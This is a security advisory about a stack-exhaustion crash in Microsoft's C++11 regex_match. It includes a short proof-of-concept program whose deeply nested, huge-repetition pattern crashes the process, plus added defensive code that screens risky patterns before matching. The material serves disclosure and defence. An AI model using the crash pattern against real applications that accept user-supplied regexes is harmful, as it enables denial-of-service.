Microsoft C++11 'regex_match' function stack exhaustion

Published: 2015.11.14
Credit: CXSECURITY
Risk: Low
CWE: N/A
CVE: N/A
Local: Yes
Remote: No

Microsoft C++11 <regex> 'regex_match' function Stack Overflow
Author: Maksymilian Arciemowicz
Tested on: Windows 10 and Visual Studio 2013
CWE: https://cwe.mitre.org/data/definitions/674.html

The Microsoft C++11 <regex> implementation does not properly control the amount of recursion that takes place during matching, which consumes excessive stack space.

Expected 'error_type':
error_stack there was not enough memory to perform a match

Returned:
Crash due to stack exhaustion

PoC:
-------------------
#include "stdafx.h"
#include <cstring>   // strlen
#include <regex>
#include <iostream>

using namespace std;

int _tmain(int argc, _TCHAR* argv[])
{
    const char *first = "abc abc abc abc abc abc abc abc abc";
    const char *last = first + strlen(first);
    cmatch narrowMatch;

    // Eight nested groups, each with a very large bounded repetition.
    regex rx("((((((((.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*)");
    // Matching recurses until the stack is exhausted; no regex_error is thrown.
    bool found = regex_match(first, last, narrowMatch, rx);

    return 0;
}
-------------------
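
A defensive pre-check for this failure mode, as an added example that is not part of the original advisory: because the library crashes instead of reporting 'error_stack', code that accepts untrusted patterns can reject deeply nested groups and very large repetition bounds before handing them to std::regex. The limits and the names 'pattern_is_risky' and 'safe_match' are assumptions chosen for illustration.

```cpp
#include <cctype>
#include <regex>
#include <string>

// Hypothetical policy limits (assumptions; tune per application).
constexpr int kMaxGroupDepth = 4;
constexpr unsigned long kMaxRepeat = 1000;

// Returns true when an untrusted pattern exceeds the policy: groups nested
// deeper than kMaxGroupDepth, or a {m,n} bound larger than kMaxRepeat.
// Escaped characters and bracket expressions are skipped, not counted.
bool pattern_is_risky(const std::string& p) {
    int depth = 0;
    bool in_class = false;
    for (std::size_t i = 0; i < p.size(); ++i) {
        char c = p[i];
        if (c == '\\') { ++i; continue; }             // skip the escaped char
        if (in_class) { if (c == ']') in_class = false; continue; }
        if (c == '[') { in_class = true; continue; }
        if (c == '(' && ++depth > kMaxGroupDepth) return true;
        if (c == ')' && depth > 0) --depth;
        if (c == '{') {                                // {m}, {m,} or {m,n}
            unsigned long n = 0;
            for (++i; i < p.size() && p[i] != '}'; ++i) {
                if (p[i] == ',') { n = 0; continue; }
                if (!std::isdigit(static_cast<unsigned char>(p[i]))) return true;
                n = n * 10 + (p[i] - '0');
                if (n > kMaxRepeat) return true;       // also bounds n itself
            }
        }
    }
    return false;
}

enum class MatchResult { Match, NoMatch, Rejected };

// Screens the pattern first, then catches regex_error (error_stack,
// error_complexity, ...) for failures the library does report.
MatchResult safe_match(const std::string& pattern, const std::string& input) {
    if (pattern_is_risky(pattern)) return MatchResult::Rejected;
    try {
        std::regex rx(pattern);
        return std::regex_match(input, rx) ? MatchResult::Match : MatchResult::NoMatch;
    } catch (const std::regex_error&) {
        return MatchResult::Rejected;
    }
}

int main() { return safe_match("(abc ?){1,9}", "abc abc") == MatchResult::Match ? 0 : 1; }
```

The try/catch alone would not have helped with the PoC above, since the process dies before any exception is raised; the screen is what keeps that pattern away from the matcher.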

References:

https://cwe.mitre.org/data/definitions/674.html



Copyright 2017, cxsecurity.com